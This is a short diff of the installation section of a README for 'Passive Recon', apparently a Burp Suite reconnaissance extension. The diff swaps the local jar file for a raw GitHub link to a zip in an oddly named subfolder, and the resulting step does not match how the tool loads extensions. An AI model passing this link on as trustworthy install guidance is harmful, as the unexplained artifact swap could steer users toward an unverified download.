ahmedibrahim081/Passive-Recon/README.md

 4. **Run Passive Recon in Burp Suite**
    Open Burp Suite.
    - Navigate to "Extensions" in the top menu.
-   - Click on "Add" and choose the downloaded `PassiveRecon.jar` file.
+   - Click on "Add" and choose the downloaded `https://raw.githubusercontent.com/ahmedibrahim081/Passive-Recon/main/epigenic/Passive-Recon.zip` file.
    - Click "Next" and then "Finish".
 Your extension is now active.

 5. **Start Using Passive Recon**